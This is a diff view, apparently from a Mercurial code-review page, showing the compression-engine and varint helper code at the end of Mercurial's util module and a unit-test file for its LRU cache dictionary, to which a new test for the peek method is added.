3642 3656 """An algorithm that produces smaller bundles than ``gzip``.
3643 3657
3644 3658 All Mercurial clients should support this format.
3645 3659
3646 3660 This engine will likely produce smaller bundles than ``gzip`` but
3647 3661 will be significantly slower, both during compression and
3648 3662 decompression.
3649 3663
3650 3664 If available, the ``zstd`` engine can yield similar or better
3651 3665 compression at much higher speeds.
3652 3666 """
3653 3667 return 'bzip2', 'BZ'
3654 3668
3655 3669 # We declare a protocol name but don't advertise by default because
3656 3670 # it is slow.
3657 3671 def wireprotosupport(self):
3658 3672 return compewireprotosupport('bzip2', 0, 0)
3659 3673
3660 3674 def compressstream(self, it, opts=None):
3661 3675 opts = opts or {}
3662 3676 z = bz2.BZ2Compressor(opts.get('level', 9))
3663 3677 for chunk in it:
3664 3678 data = z.compress(chunk)
3665 3679 if data:
3666 3680 yield data
3667 3681
3668 3682 yield z.flush()
3669 3683
3670 3684 def decompressorreader(self, fh):
3671 3685 return _BZ2CompressedStreamReader(fh)
3672 3686
3673 3687 compengines.register(_bz2engine())
3674 3688
3675 3689 class _truncatedbz2engine(compressionengine):
3676 3690 def name(self):
3677 3691 return 'bz2truncated'
3678 3692
3679 3693 def bundletype(self):
3680 3694 return None, '_truncatedBZ'
3681 3695
3682 3696 # We don't implement compressstream because it is hackily handled elsewhere.
3683 3697
3684 3698 def decompressorreader(self, fh):
3685 3699 return _TruncatedBZ2CompressedStreamReader(fh)
3686 3700
3687 3701 compengines.register(_truncatedbz2engine())
3688 3702
3689 3703 class _noopengine(compressionengine):
3690 3704 def name(self):
3691 3705 return 'none'
3692 3706
3693 3707 def bundletype(self):
3694 3708 """No compression is performed.
3695 3709
3696 3710 Use this compression engine to explicitly disable compression.
3697 3711 """
3698 3712 return 'none', 'UN'
3699 3713
3700 3714 # Clients always support uncompressed payloads. Servers don't because
3701 3715 # unless you are on a fast network, uncompressed payloads can easily
3702 3716 # saturate your network pipe.
3703 3717 def wireprotosupport(self):
3704 3718 return compewireprotosupport('none', 0, 10)
3705 3719
3706 3720 # We don't implement revlogheader because it is handled specially
3707 3721 # in the revlog class.
3708 3722
3709 3723 def compressstream(self, it, opts=None):
3710 3724 return it
3711 3725
3712 3726 def decompressorreader(self, fh):
3713 3727 return fh
3714 3728
3715 3729 class nooprevlogcompressor(object):
3716 3730 def compress(self, data):
3717 3731 return None
3718 3732
3719 3733 def revlogcompressor(self, opts=None):
3720 3734 return self.nooprevlogcompressor()
3721 3735
3722 3736 compengines.register(_noopengine())
3723 3737
3724 3738 class _zstdengine(compressionengine):
3725 3739 def name(self):
3726 3740 return 'zstd'
3727 3741
3728 3742 @propertycache
3729 3743 def _module(self):
3730 3744 # Not all installs have the zstd module available. So defer importing
3731 3745 # until first access.
3732 3746 try:
3733 3747 from . import zstd
3734 3748 # Force delayed import.
3735 3749 zstd.__version__
3736 3750 return zstd
3737 3751 except ImportError:
3738 3752 return None
3739 3753
3740 3754 def available(self):
3741 3755 return bool(self._module)
3742 3756
3743 3757 def bundletype(self):
3744 3758 """A modern compression algorithm that is fast and highly flexible.
3745 3759
3746 3760 Only supported by Mercurial 4.1 and newer clients.
3747 3761
3748 3762 With the default settings, zstd compression is both faster and yields
3749 3763 better compression than ``gzip``. It also frequently yields better
3750 3764 compression than ``bzip2`` while operating at much higher speeds.
3751 3765
3752 3766 If this engine is available and backwards compatibility is not a
3753 3767 concern, it is likely the best available engine.
3754 3768 """
3755 3769 return 'zstd', 'ZS'
3756 3770
3757 3771 def wireprotosupport(self):
3758 3772 return compewireprotosupport('zstd', 50, 50)
3759 3773
3760 3774 def revlogheader(self):
3761 3775 return '\x28'
3762 3776
3763 3777 def compressstream(self, it, opts=None):
3764 3778 opts = opts or {}
3765 3779 # zstd level 3 is almost always significantly faster than zlib
3766 3780 # while providing no worse compression. It strikes a good balance
3767 3781 # between speed and compression.
3768 3782 level = opts.get('level', 3)
3769 3783
3770 3784 zstd = self._module
3771 3785 z = zstd.ZstdCompressor(level=level).compressobj()
3772 3786 for chunk in it:
3773 3787 data = z.compress(chunk)
3774 3788 if data:
3775 3789 yield data
3776 3790
3777 3791 yield z.flush()
3778 3792
3779 3793 def decompressorreader(self, fh):
3780 3794 return _ZstdCompressedStreamReader(fh, self._module)
3781 3795
3782 3796 class zstdrevlogcompressor(object):
3783 3797 def __init__(self, zstd, level=3):
3784 3798 # TODO consider omitting frame magic to save 4 bytes.
3785 3799 # This writes content sizes into the frame header. That is
3786 3800 # extra storage. But it allows a correct size memory allocation
3787 3801 # to hold the result.
3788 3802 self._cctx = zstd.ZstdCompressor(level=level)
3789 3803 self._dctx = zstd.ZstdDecompressor()
3790 3804 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3791 3805 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3792 3806
3793 3807 def compress(self, data):
3794 3808 insize = len(data)
3795 3809 # Caller handles empty input case.
3796 3810 assert insize > 0
3797 3811
3798 3812 if insize < 50:
3799 3813 return None
3800 3814
3801 3815 elif insize <= 1000000:
3802 3816 compressed = self._cctx.compress(data)
3803 3817 if len(compressed) < insize:
3804 3818 return compressed
3805 3819 return None
3806 3820 else:
3807 3821 z = self._cctx.compressobj()
3808 3822 chunks = []
3809 3823 pos = 0
3810 3824 while pos < insize:
3811 3825 pos2 = pos + self._compinsize
3812 3826 chunk = z.compress(data[pos:pos2])
3813 3827 if chunk:
3814 3828 chunks.append(chunk)
3815 3829 pos = pos2
3816 3830 chunks.append(z.flush())
3817 3831
3818 3832 if sum(map(len, chunks)) < insize:
3819 3833 return ''.join(chunks)
3820 3834 return None
3821 3835
3822 3836 def decompress(self, data):
3823 3837 insize = len(data)
3824 3838
3825 3839 try:
3826 3840 # This was measured to be faster than other streaming
3827 3841 # decompressors.
3828 3842 dobj = self._dctx.decompressobj()
3829 3843 chunks = []
3830 3844 pos = 0
3831 3845 while pos < insize:
3832 3846 pos2 = pos + self._decompinsize
3833 3847 chunk = dobj.decompress(data[pos:pos2])
3834 3848 if chunk:
3835 3849 chunks.append(chunk)
3836 3850 pos = pos2
3837 3851 # Frame should be exhausted, so no finish() API.
3838 3852
3839 3853 return ''.join(chunks)
3840 3854 except Exception as e:
3841 3855 raise error.StorageError(_('revlog decompress error: %s') %
3842 3856 stringutil.forcebytestr(e))
3843 3857
3844 3858 def revlogcompressor(self, opts=None):
3845 3859 opts = opts or {}
3846 3860 return self.zstdrevlogcompressor(self._module,
3847 3861 level=opts.get('level', 3))
3848 3862
3849 3863 compengines.register(_zstdengine())
3850 3864
3851 3865 def bundlecompressiontopics():
3852 3866 """Obtains a list of available bundle compressions for use in help."""
3853 3867 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3854 3868 items = {}
3855 3869
3856 3870 # We need to format the docstring. So use a dummy object/type to hold it
3857 3871 # rather than mutating the original.
3858 3872 class docobject(object):
3859 3873 pass
3860 3874
3861 3875 for name in compengines:
3862 3876 engine = compengines[name]
3863 3877
3864 3878 if not engine.available():
3865 3879 continue
3866 3880
3867 3881 bt = engine.bundletype()
3868 3882 if not bt or not bt[0]:
3869 3883 continue
3870 3884
3871 3885 doc = b'``%s``\n %s' % (bt[0], pycompat.getdoc(engine.bundletype))
3872 3886
3873 3887 value = docobject()
3874 3888 value.__doc__ = pycompat.sysstr(doc)
3875 3889 value._origdoc = engine.bundletype.__doc__
3876 3890 value._origfunc = engine.bundletype
3877 3891
3878 3892 items[bt[0]] = value
3879 3893
3880 3894 return items
3881 3895
3882 3896 i18nfunctions = bundlecompressiontopics().values()
3883 3897
3884 3898 # convenient shortcut
3885 3899 dst = debugstacktrace
3886 3900
3887 3901 def safename(f, tag, ctx, others=None):
3888 3902 """
3889 3903 Generate a name that it is safe to rename f to in the given context.
3890 3904
3891 3905 f: filename to rename
3892 3906 tag: a string tag that will be included in the new name
3893 3907 ctx: a context, in which the new name must not exist
3894 3908 others: a set of other filenames that the new name must not be in
3895 3909
3896 3910 Returns a file name of the form oldname~tag[~number] which does not exist
3897 3911 in the provided context and is not in the set of other names.
3898 3912 """
3899 3913 if others is None:
3900 3914 others = set()
3901 3915
3902 3916 fn = '%s~%s' % (f, tag)
3903 3917 if fn not in ctx and fn not in others:
3904 3918 return fn
3905 3919 for n in itertools.count(1):
3906 3920 fn = '%s~%s~%s' % (f, tag, n)
3907 3921 if fn not in ctx and fn not in others:
3908 3922 return fn
3909 3923
3910 3924 def readexactly(stream, n):
3911 3925 '''read n bytes from stream.read and abort if less was available'''
3912 3926 s = stream.read(n)
3913 3927 if len(s) < n:
3914 3928 raise error.Abort(_("stream ended unexpectedly"
3915 3929 " (got %d bytes, expected %d)")
3916 3930 % (len(s), n))
3917 3931 return s
3918 3932
3919 3933 def uvarintencode(value):
3920 3934 """Encode an unsigned integer value to a varint.
3921 3935
3922 3936 A varint is a variable length integer of 1 or more bytes. Each byte
3923 3937 except the last has the most significant bit set. The lower 7 bits of
3924 3938 each byte store the 2's complement representation, least significant group
3925 3939 first.
3926 3940
3927 3941 >>> uvarintencode(0)
3928 3942 '\\x00'
3929 3943 >>> uvarintencode(1)
3930 3944 '\\x01'
3931 3945 >>> uvarintencode(127)
3932 3946 '\\x7f'
3933 3947 >>> uvarintencode(1337)
3934 3948 '\\xb9\\n'
3935 3949 >>> uvarintencode(65536)
3936 3950 '\\x80\\x80\\x04'
3937 3951 >>> uvarintencode(-1)
3938 3952 Traceback (most recent call last):
3939 3953 ...
3940 3954 ProgrammingError: negative value for uvarint: -1
3941 3955 """
3942 3956 if value < 0:
3943 3957 raise error.ProgrammingError('negative value for uvarint: %d'
3944 3958 % value)
3945 3959 bits = value & 0x7f
3946 3960 value >>= 7
3947 3961 bytes = []
3948 3962 while value:
3949 3963 bytes.append(pycompat.bytechr(0x80 | bits))
3950 3964 bits = value & 0x7f
3951 3965 value >>= 7
3952 3966 bytes.append(pycompat.bytechr(bits))
3953 3967
3954 3968 return ''.join(bytes)
3955 3969
3956 3970 def uvarintdecodestream(fh):
3957 3971 """Decode an unsigned variable length integer from a stream.
3958 3972
3959 3973 The passed argument is anything that has a ``.read(N)`` method.
3960 3974
3961 3975 >>> try:
3962 3976 ... from StringIO import StringIO as BytesIO
3963 3977 ... except ImportError:
3964 3978 ... from io import BytesIO
3965 3979 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3966 3980 0
3967 3981 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3968 3982 1
3969 3983 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3970 3984 127
3971 3985 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3972 3986 1337
3973 3987 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3974 3988 65536
3975 3989 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3976 3990 Traceback (most recent call last):
3977 3991 ...
3978 3992 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3979 3993 """
3980 3994 result = 0
3981 3995 shift = 0
3982 3996 while True:
3983 3997 byte = ord(readexactly(fh, 1))
3984 3998 result |= ((byte & 0x7f) << shift)
3985 3999 if not (byte & 0x80):
3986 4000 return result
3987 4001 shift += 7
@@ -1,337 +1,352
1 1 from __future__ import absolute_import, print_function
2 2
3 3 import unittest
4 4
5 5 import silenttestrunner
6 6
7 7 from mercurial import (
8 8 util,
9 9 )
10 10
11 11 class testlrucachedict(unittest.TestCase):
12 12 def testsimple(self):
13 13 d = util.lrucachedict(4)
14 14 self.assertEqual(d.capacity, 4)
15 15 d.insert('a', 'va', cost=2)
16 16 d['b'] = 'vb'
17 17 d['c'] = 'vc'
18 18 d.insert('d', 'vd', cost=42)
19 19
20 20 self.assertEqual(d['a'], 'va')
21 21 self.assertEqual(d['b'], 'vb')
22 22 self.assertEqual(d['c'], 'vc')
23 23 self.assertEqual(d['d'], 'vd')
24 24
25 25 self.assertEqual(d.totalcost, 44)
26 26
27 27 # 'a' should be dropped because it was least recently used.
28 28 d['e'] = 've'
29 29 self.assertNotIn('a', d)
30 30 self.assertIsNone(d.get('a'))
31 31 self.assertEqual(d.totalcost, 42)
32 32
33 33 self.assertEqual(d['b'], 'vb')
34 34 self.assertEqual(d['c'], 'vc')
35 35 self.assertEqual(d['d'], 'vd')
36 36 self.assertEqual(d['e'], 've')
37 37
38 38 # Replacing item with different cost adjusts totalcost.
39 39 d.insert('e', 've', cost=4)
40 40 self.assertEqual(d.totalcost, 46)
41 41
42 42 # Touch entries in some order (both get and set).
43 43 d['e']
44 44 d['c'] = 'vc2'
45 45 d['d']
46 46 d['b'] = 'vb2'
47 47
48 48 # 'e' should be dropped now
49 49 d['f'] = 'vf'
50 50 self.assertNotIn('e', d)
51 51 self.assertEqual(d['b'], 'vb2')
52 52 self.assertEqual(d['c'], 'vc2')
53 53 self.assertEqual(d['d'], 'vd')
54 54 self.assertEqual(d['f'], 'vf')
55 55
56 56 d.clear()
57 57 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
58 58 self.assertNotIn(key, d)
59 59
60 60 def testunfull(self):
61 61 d = util.lrucachedict(4)
62 62 d['a'] = 1
63 63 d['b'] = 2
64 64 d['a']
65 65 d['b']
66 66
67 67 for key in ('a', 'b'):
68 68 self.assertIn(key, d)
69 69
70 70 def testget(self):
71 71 d = util.lrucachedict(4)
72 72 d['a'] = 'va'
73 73 d['b'] = 'vb'
74 74 d['c'] = 'vc'
75 75
76 76 self.assertIsNone(d.get('missing'))
77 77 self.assertEqual(list(d), ['c', 'b', 'a'])
78 78
79 79 self.assertEqual(d.get('a'), 'va')
80 80 self.assertEqual(list(d), ['a', 'c', 'b'])
81 81
82 def testpeek(self):
83 d = util.lrucachedict(4)
84 d['a'] = 'va'
85 d['b'] = 'vb'
86 d['c'] = 'vc'
87
88 with self.assertRaises(KeyError):
89 d.peek('missing')
90 self.assertEqual(list(d), ['c', 'b', 'a'])
91 self.assertIsNone(d.peek('missing', None))
92 self.assertEqual(list(d), ['c', 'b', 'a'])
93
94 self.assertEqual(d.peek('a'), 'va')
95 self.assertEqual(list(d), ['c', 'b', 'a'])
96
82 97 def testcopypartial(self):
83 98 d = util.lrucachedict(4)
84 99 d.insert('a', 'va', cost=4)
85 100 d.insert('b', 'vb', cost=2)
86 101
87 102 dc = d.copy()
88 103
89 104 self.assertEqual(len(dc), 2)
90 105 self.assertEqual(dc.totalcost, 6)
91 106 for key in ('a', 'b'):
92 107 self.assertIn(key, dc)
93 108 self.assertEqual(dc[key], 'v%s' % key)
94 109
95 110 self.assertEqual(len(d), 2)
96 111 for key in ('a', 'b'):
97 112 self.assertIn(key, d)
98 113 self.assertEqual(d[key], 'v%s' % key)
99 114
100 115 d['c'] = 'vc'
101 116 del d['b']
102 117 self.assertEqual(d.totalcost, 4)
103 118 dc = d.copy()
104 119 self.assertEqual(len(dc), 2)
105 120 self.assertEqual(dc.totalcost, 4)
106 121 for key in ('a', 'c'):
107 122 self.assertIn(key, dc)
108 123 self.assertEqual(dc[key], 'v%s' % key)
109 124
110 125 def testcopyempty(self):
111 126 d = util.lrucachedict(4)
112 127 dc = d.copy()
113 128 self.assertEqual(len(dc), 0)
114 129
115 130 def testcopyfull(self):
116 131 d = util.lrucachedict(4)
117 132 d.insert('a', 'va', cost=42)
118 133 d['b'] = 'vb'
119 134 d['c'] = 'vc'
120 135 d['d'] = 'vd'
121 136
122 137 dc = d.copy()
123 138
124 139 for key in ('a', 'b', 'c', 'd'):
125 140 self.assertIn(key, dc)
126 141 self.assertEqual(dc[key], 'v%s' % key)
127 142
128 143 self.assertEqual(d.totalcost, 42)
129 144 self.assertEqual(dc.totalcost, 42)
130 145
131 146 # 'a' should be dropped because it was least recently used.
132 147 dc['e'] = 've'
133 148 self.assertNotIn('a', dc)
134 149 for key in ('b', 'c', 'd', 'e'):
135 150 self.assertIn(key, dc)
136 151 self.assertEqual(dc[key], 'v%s' % key)
137 152
138 153 self.assertEqual(d.totalcost, 42)
139 154 self.assertEqual(dc.totalcost, 0)
140 155
141 156 # Contents and order of original dict should remain unchanged.
142 157 dc['b'] = 'vb_new'
143 158
144 159 self.assertEqual(list(iter(d)), ['d', 'c', 'b', 'a'])
145 160 for key in ('a', 'b', 'c', 'd'):
146 161 self.assertEqual(d[key], 'v%s' % key)
147 162
148 163 d = util.lrucachedict(4, maxcost=42)
149 164 d.insert('a', 'va', cost=5)
150 165 d.insert('b', 'vb', cost=4)
151 166 d.insert('c', 'vc', cost=3)
152 167 dc = d.copy()
153 168 self.assertEqual(dc.maxcost, 42)
154 169 self.assertEqual(len(dc), 3)
155 170
156 171 # Max cost can be lowered as part of copy.
157 172 dc = d.copy(maxcost=10)
158 173 self.assertEqual(dc.maxcost, 10)
159 174 self.assertEqual(len(dc), 2)
160 175 self.assertEqual(dc.totalcost, 7)
161 176 self.assertIn('b', dc)
162 177 self.assertIn('c', dc)
163 178
164 179 def testcopydecreasecapacity(self):
165 180 d = util.lrucachedict(5)
166 181 d.insert('a', 'va', cost=4)
167 182 d.insert('b', 'vb', cost=2)
168 183 d['c'] = 'vc'
169 184 d['d'] = 'vd'
170 185
171 186 dc = d.copy(2)
172 187 self.assertEqual(dc.totalcost, 0)
173 188 for key in ('a', 'b'):
174 189 self.assertNotIn(key, dc)
175 190 for key in ('c', 'd'):
176 191 self.assertIn(key, dc)
177 192 self.assertEqual(dc[key], 'v%s' % key)
178 193
179 194 dc.insert('e', 've', cost=7)
180 195 self.assertEqual(dc.totalcost, 7)
181 196 self.assertNotIn('c', dc)
182 197 for key in ('d', 'e'):
183 198 self.assertIn(key, dc)
184 199 self.assertEqual(dc[key], 'v%s' % key)
185 200
186 201 # Original should remain unchanged.
187 202 self.assertEqual(d.totalcost, 6)
188 203 for key in ('a', 'b', 'c', 'd'):
189 204 self.assertIn(key, d)
190 205 self.assertEqual(d[key], 'v%s' % key)
191 206
192 207 def testcopyincreasecapacity(self):
193 208 d = util.lrucachedict(5)
194 209 d['a'] = 'va'
195 210 d['b'] = 'vb'
196 211 d['c'] = 'vc'
197 212 d['d'] = 'vd'
198 213
199 214 dc = d.copy(6)
200 215 for key in ('a', 'b', 'c', 'd'):
201 216 self.assertIn(key, dc)
202 217 self.assertEqual(dc[key], 'v%s' % key)
203 218
204 219 dc['e'] = 've'
205 220 dc['f'] = 'vf'
206 221 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
207 222 self.assertIn(key, dc)
208 223 self.assertEqual(dc[key], 'v%s' % key)
209 224
210 225 dc['g'] = 'vg'
211 226 self.assertNotIn('a', dc)
212 227 for key in ('b', 'c', 'd', 'e', 'f', 'g'):
213 228 self.assertIn(key, dc)
214 229 self.assertEqual(dc[key], 'v%s' % key)
215 230
216 231 # Original should remain unchanged.
217 232 for key in ('a', 'b', 'c', 'd'):
218 233 self.assertIn(key, d)
219 234 self.assertEqual(d[key], 'v%s' % key)
220 235
221 236 def testpopoldest(self):
222 237 d = util.lrucachedict(4)
223 238 d.insert('a', 'va', cost=10)
224 239 d.insert('b', 'vb', cost=5)
225 240
226 241 self.assertEqual(len(d), 2)
227 242 self.assertEqual(d.popoldest(), ('a', 'va'))
228 243 self.assertEqual(len(d), 1)
229 244 self.assertEqual(d.totalcost, 5)
230 245 self.assertEqual(d.popoldest(), ('b', 'vb'))
231 246 self.assertEqual(len(d), 0)
232 247 self.assertEqual(d.totalcost, 0)
233 248 self.assertIsNone(d.popoldest())
234 249
235 250 d['a'] = 'va'
236 251 d['b'] = 'vb'
237 252 d['c'] = 'vc'
238 253 d['d'] = 'vd'
239 254
240 255 self.assertEqual(d.popoldest(), ('a', 'va'))
241 256 self.assertEqual(len(d), 3)
242 257 for key in ('b', 'c', 'd'):
243 258 self.assertEqual(d[key], 'v%s' % key)
244 259
245 260 d['a'] = 'va'
246 261 self.assertEqual(d.popoldest(), ('b', 'vb'))
247 262
248 263 def testmaxcost(self):
249 264 # Item cost is zero by default.
250 265 d = util.lrucachedict(6, maxcost=10)
251 266 d['a'] = 'va'
252 267 d['b'] = 'vb'
253 268 d['c'] = 'vc'
254 269 d['d'] = 'vd'
255 270 self.assertEqual(len(d), 4)
256 271 self.assertEqual(d.totalcost, 0)
257 272
258 273 d.clear()
259 274
260 275 # Insertion to exact cost threshold works without eviction.
261 276 d.insert('a', 'va', cost=6)
262 277 d.insert('b', 'vb', cost=4)
263 278
264 279 self.assertEqual(len(d), 2)
265 280 self.assertEqual(d['a'], 'va')
266 281 self.assertEqual(d['b'], 'vb')
267 282
268 283 # Inserting a new element with 0 cost works.
269 284 d['c'] = 'vc'
270 285 self.assertEqual(len(d), 3)
271 286
272 287 # Inserting a new element with cost putting us above high
273 288 # water mark evicts oldest single item.
274 289 d.insert('d', 'vd', cost=1)
275 290 self.assertEqual(len(d), 3)
276 291 self.assertEqual(d.totalcost, 5)
277 292 self.assertNotIn('a', d)
278 293 for key in ('b', 'c', 'd'):
279 294 self.assertEqual(d[key], 'v%s' % key)
280 295
281 296 # Inserting a new element with enough room for just itself
282 297 # evicts all items before.
283 298 d.insert('e', 've', cost=10)
284 299 self.assertEqual(len(d), 1)
285 300 self.assertEqual(d.totalcost, 10)
286 301 self.assertIn('e', d)
287 302
288 303 # Inserting a new element with cost greater than threshold
289 304 # still retains that item.
290 305 d.insert('f', 'vf', cost=11)
291 306 self.assertEqual(len(d), 1)
292 307 self.assertEqual(d.totalcost, 11)
293 308 self.assertIn('f', d)
294 309
295 310 # Inserting a new element will evict the last item since it is
296 311 # too large.
297 312 d['g'] = 'vg'
298 313 self.assertEqual(len(d), 1)
299 314 self.assertEqual(d.totalcost, 0)
300 315 self.assertIn('g', d)
301 316
302 317 d.clear()
303 318
304 319 d.insert('a', 'va', cost=7)
305 320 d.insert('b', 'vb', cost=3)
306 321 self.assertEqual(len(d), 2)
307 322
308 323 # Replacing a value with smaller cost won't result in eviction.
309 324 d.insert('b', 'vb2', cost=2)
310 325 self.assertEqual(len(d), 2)
311 326
312 327 # Replacing a value with a higher cost will evict when threshold
313 328 # exceeded.
314 329 d.insert('b', 'vb3', cost=4)
315 330 self.assertEqual(len(d), 1)
316 331 self.assertNotIn('a', d)
317 332
318 333 def testmaxcostcomplex(self):
319 334 d = util.lrucachedict(100, maxcost=100)
320 335 d.insert('a', 'va', cost=9)
321 336 d.insert('b', 'vb', cost=21)
322 337 d.insert('c', 'vc', cost=7)
323 338 d.insert('d', 'vc', cost=50)
324 339 self.assertEqual(d.totalcost, 87)
325 340
326 341 # Inserting new element should free multiple elements so we hit
327 342 # low water mark.
328 343 d.insert('e', 'vd', cost=25)
329 344 self.assertEqual(len(d), 2)
330 345 self.assertNotIn('a', d)
331 346 self.assertNotIn('b', d)
332 347 self.assertNotIn('c', d)
333 348 self.assertIn('d', d)
334 349 self.assertIn('e', d)
335 350
336 351 if __name__ == '__main__':
337 352 silenttestrunner.main(__name__)
General Comments 0
You need to be logged in to leave comments. Login now